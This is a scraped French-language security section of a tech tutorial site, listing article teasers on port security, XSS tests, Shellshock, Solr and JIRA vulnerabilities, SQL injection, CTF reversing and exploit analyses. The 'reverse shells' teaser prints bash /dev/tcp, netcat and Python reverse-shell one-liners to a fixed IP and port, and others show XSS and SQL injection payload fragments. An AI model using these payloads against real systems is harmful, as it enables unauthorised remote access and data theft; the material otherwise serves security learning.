localisation actuelle:Maison > Articles techniques > Opération et maintenance > Sécurité
- Direction:
- tous web3.0 développement back-end interface Web base de données Opération et maintenance outils de développement cadre php programmation quotidienne Applet WeChat Problème commun autre technologie Tutoriel CMS Java Tutoriel système tutoriels informatiques Tutoriel matériel Tutoriel mobile Tutoriel logiciel Tutoriel de jeu mobile
- Classer:
-
- Qu'est-ce que la technologie de sécurité portuaire H3C ?
- À l’heure où Internet se développe de plus en plus, la sécurité est un sujet auquel il faut prêter attention. De nombreux comportements menacent les ports de commutation dans les entreprises, tels que les hôtes d'utilisateurs non autorisés se connectant de manière aléatoire au réseau de l'entreprise. Par exemple, si les employés possèdent leur propre ordinateur portable, ils peuvent débrancher le câble réseau d'un hôte donné sans le consentement de l'administrateur, le brancher sur l'ordinateur portable qu'ils ont apporté, puis le connecter au réseau de l'entreprise. Cela entraînera de grands risques pour la sécurité. cela est très susceptible d’entraîner la perte d’informations confidentielles. Un autre exemple est l’installation de hubs et autres équipements réseau sans consentement. Afin d'augmenter le nombre de terminaux du réseau, certains salariés le feront sans autorisation. Branchez des appareils tels que des hubs et des commutateurs sur l'interface réseau du bureau. Dans ce cas, le trafic de l'interface du commutateur correspondant à cette interface réseau va augmenter.
- Sécurité 1120 2023-05-19 12:46:46
-
- Analyse des instances IPSec basée sur GRE
- IPSecoverGRE
- Sécurité 1007 2023-05-19 12:40:06
-
- Comment se déroule le petit test de xss ?
- Il n'y a aucune restriction de sécurité, utilisez simplement alert(/xss/); Restrictions : Seuls les CSS peuvent être utilisés, les balises html ne sont pas autorisées. Nous savons que cette expression peut être utilisée pour construire du XSS, mais elle ne peut être testée que sous IE, donc. le test suivant Veuillez exécuter dans IE6. body{black;xss:alert(/xss/));/*Testé sous IE6*/}Restrictions : le HTML est échappé et la balise Image est disponible. Les caractères saisis par le test seront insérés dans l'adresse src, vous pourrez donc utiliser un pseudo protocole pour la contourner. Entrez directement alert(/xss/); ou vous pouvez utiliser des événements pour le contourner. Faites simplement attention à l'instruction de clôture, comme suit : 1&quo.
- Sécurité 1010 2023-05-19 11:37:06
-
- Exemple d'analyse de la récurrence de la vulnérabilité bash
- BourneAgainShell (BASH en abrégé) est l'implémentation SHELL la plus populaire sur GNU/Linux. Elle est née en 1980. Après des décennies d'évolution, elle est passée d'un simple interpréteur de ligne de commande de terminal à une interface multifonctionnelle profondément intégrée au système GNU. . Bash, un type de shell Unix. La première version officielle a été publiée en 1989. Elle était initialement prévue pour être utilisée sur le système d'exploitation GNU, mais elle peut fonctionner sur la plupart des systèmes d'exploitation de type Unix, notamment Linux et MacOSXv10.4, qui l'utilisent comme shell par défaut. Il a également été porté sur Cygwin et MinGW sur Microsoft Windows, ou peut être utilisé sur MS-
- Sécurité 1311 2023-05-19 11:13:11
-
- Comment Zabbix surveille les données Traceroute
- 1. Zabbixserver et proxy installent le script mtrmtr et placez-le dans le chemin suivant de zabbixserver et proxy : exécutez chownzabbix:zabbixmtrtrace.shzabbix pour créer le modèle mtrtrace : 5. Associez l'hôte au modèle et observez les données dans zabbix : [surveillance ]-[dernières données] :
- Sécurité 956 2023-05-19 11:10:12
-
- Exemple d'analyse de la vulnérabilité RCE d'injection de modèle de vitesse Apache Solr
- 0x01 Introduction Solr est un serveur d'applications de recherche indépendant au niveau de l'entreprise qui fournit une interface API similaire à un service Web. Les utilisateurs peuvent soumettre des fichiers XML dans un certain format au serveur du moteur de recherche via des requêtes http pour générer des index ; ils peuvent également effectuer des requêtes de recherche via des opérations HttpGet et obtenir les résultats renvoyés au format XML. 0x02 Introduction à la vulnérabilité Le composant VelocityResponseWriter existe dans Solr. Un attaquant peut construire une requête spécifique pour modifier la configuration appropriée, de sorte que le composant VelocityResponseWriter permette le chargement du modèle spécifié, ce qui à son tour amène le modèle Velocity à injecter une vulnérabilité d'exécution de commande à distance. L'attaquant exploite cela
- Sécurité 1021 2023-05-19 10:37:13
-
- Analyse d'un exemple d'utilisation de la vulnérabilité JIRA pour accéder au réseau de routeurs de protocole Internet non classifié de l'armée américaine
- Ce qui suit décrit comment l'auteur a participé au projet de test public de la vulnérabilité Hack the Pentagon du Département américain de la Défense (DoD) et a utilisé la vulnérabilité JIRA CVE-2017-9506 pour construire une surface d'attaque SSRF et accéder à l'Internet non confidentiel de l'armée américaine. Protocol Router Network (NIPRnet), et en combinaison avec d'autres techniques de vulnérabilité, une série d'informations sensibles du système intranet du DoD a été obtenue. En raison de la nature confidentielle du processus et du contenu du test, cet article n'aborde que ce point sans divulguer trop de détails techniques et de scénarios détaillés. Il est uniquement destiné à l'apprentissage et au partage, et j'espère que les lecteurs me supporteront. JIRA est un excellent outil logiciel de suivi et de gestion des problèmes développé par la société Atlassian en Australie. Il peut suivre et gérer différents types de problèmes.
- Sécurité 1084 2023-05-18 22:29:09
-
- Quels sont les types d'injection SQL ?
- Préface Les méthodes d'attaque par injection SQL peuvent être divisées en injection explicite, injection d'erreur et injection aveugle en fonction de l'application traitant le contenu renvoyé par la base de données. Les attaquants par injection explicite peuvent obtenir directement le contenu souhaité à partir du contenu actuel de l'interface. Le résultat renvoyé par la requête de base de données d'injection d'erreurs n'est pas affiché sur la page, mais l'application imprime les informations d'erreur de base de données sur la page, afin que l'attaquant puisse construire une instruction d'erreur de base de données et obtenir le contenu souhaité à partir des informations d'erreur. Les résultats des requêtes de base de données par injection aveugle ne peuvent pas être obtenus à partir de la page intuitive. L'attaquant obtient le contenu souhaité en utilisant la logique de la base de données ou en retardant l'exécution de la bibliothèque de base de données. Injection manuelle Mysql injection combinée?id=1'orderby4--
- Sécurité 2110 2023-05-18 22:05:12
-
- Que sont les obus à rebond ?
- 1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
- Sécurité 2119 2023-05-18 22:01:04
-
- Comment utiliser le nouveau framework APT de la NSA, DarkPulsar
- Préface En mars 2017, ShadowBrokers a publié un document confidentiel qui a choqué le monde, comprenant deux frameworks : DanderSpritz et FuzzBunch. DanderSpritz est entièrement composé de plugins et est utilisé pour recueillir des renseignements, exploiter les vulnérabilités et manipuler les appareils pris en charge. Il est écrit en Java et fournit une interface graphique similaire au panneau de gestion du botnet et un panneau de contrôle similaire à l'outil Metasploit. Il intègre également des portes dérobées et des plugins pour les appareils non contrôlés par FuzzBunch. Présentation de l'interface DanderSprit Fuzzbunch fournit un cadre permettant à différents utilitaires d'interagir et de travailler ensemble, y compris divers types de plug-ins.
- Sécurité 1314 2023-05-18 20:14:58
-
- Comment analyser la vulnérabilité de contournement du bac à sable Ghostscript SAFER
- Préface Ghostscript est un logiciel interpréteur du langage Adobe PostScript. Il peut dessiner en langage PostScript et prend en charge la conversion entre PS et PDF. Actuellement, il est installé par défaut dans la plupart des distributions Linux et a été porté sur Unix, MacOS, Windows et d'autres plates-formes. Ghostscript est également utilisé par des programmes tels que ImagineMagic, PythonPIL et divers lecteurs PDF. Description de la vulnérabilité Le 21 août, le chercheur en sécurité de Google, Tavis Ormandy, a révélé plusieurs vulnérabilités GhostScript. En créant des scripts PostScript malveillants dans des images, vous pouvez les contourner.
- Sécurité 1468 2023-05-18 19:10:39
-
- DDCTF2019两个逆向分别是什么
- 01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
- Sécurité 1462 2023-05-18 17:13:20
-
- Analyse d'exemples de contournement des restrictions et d'accès aux systèmes de gestion interne de Google
- Un jour, en recherchant les vulnérabilités de Google, j'ai découvert certaines adresses IP des propres services de Google à partir de vulnérabilités publiques. Au début, je ne savais vraiment pas ce que ces adresses IP pouvaient faire. J'ai d'abord vérifié ces adresses IP et j'ai découvert qu'elles contenaient certaines des adresses IP internes de Google. Je me suis soudainement rappelé que récemment, mon ami KLSREERAM avait signalé une vulnérabilité liée à l'adresse IP interne de Google, et un autre ami Vishnu avait signalé une vulnérabilité qui utilisait les sous-domaines de Google pour accéder au panneau de configuration. Actuellement, les deux vulnérabilités ont été corrigées par Google et les adresses IP internes liées à ces deux vulnérabilités ne sont pas accessibles depuis Internet. Mais maintenant, avec plusieurs adresses IP internes de Google devant moi, je dois trouver un moyen de voir si je peux
- Sécurité 1109 2023-05-18 15:19:49
-
- Comment implémenter l'analyse de vulnérabilité de l'application Disk Pulse Enterprise Window
- 1. Introduction à la vulnérabilité DiskPulseEnterprise est un logiciel qui surveille les modifications du disque. Il peut se connecter et gérer le logiciel via un port de gestion 9120 ou une fenêtre de gestion Web 80 pour surveiller les modifications du disque. Il existe une bibliothèque de liens dynamiques libspp.dll dans DiskPulse Enterprise, qui contient certaines fonctions responsables des opérations HTTP. Le problème se produit dans cette bibliothèque de liens dynamiques lors du traitement des données de publication, car il n'y a pas de contrôle strict de la longueur des données de publication. Lors de l'exécution des données acquises, les données sont copiées dans une mémoire invalide, provoquant un débordement de tampon, déclenchant le traitement de comportement anormal SEH et finalement contrôlant EIP pour exécuter du code arbitraire. Lien de téléchargement du logiciel : h
- Sécurité 1106 2023-05-18 15:04:07
-
- Quelle est la principale raison du crash de l'APP ?
- 1. Quels types de scénarios sont susceptibles de provoquer des problèmes de crash ? Récemment, j'ai réfléchi aux types de problèmes susceptibles de provoquer des crashs, c'est-à-dire avoir une pensée anormale. Par exemple : j'ai regardé une série télévisée américaine intitulée « The Rookie ». " il y a à peine deux jours. "Police", il y a une scène dans laquelle le protagoniste John Nolan n'a pas réussi à arrêter la voiture du fugitif avec une voiture de police, provoquant la fuite du fugitif. Quel est le lien entre cette scène et le test ? Tout d'abord, les gens normaux éviteront les collisions avec les autres lorsqu'ils conduisent sur la route. C'est comme le processus principal de test d'une fonction, et ils ne feront pas de saisies aléatoires, mais le policier fera tout ce qu'il faut pour l'attraper. le fugitif. Toutes les méthodes, c'est comme une réflexion anormale pendant le processus de test, réfléchir à la façon de faire fonctionner la fonction pour la rendre difficile à utiliser. Guide 1. Opérations anormales Diverses opérations anormales
- Sécurité 2485 2023-05-18 13:55:06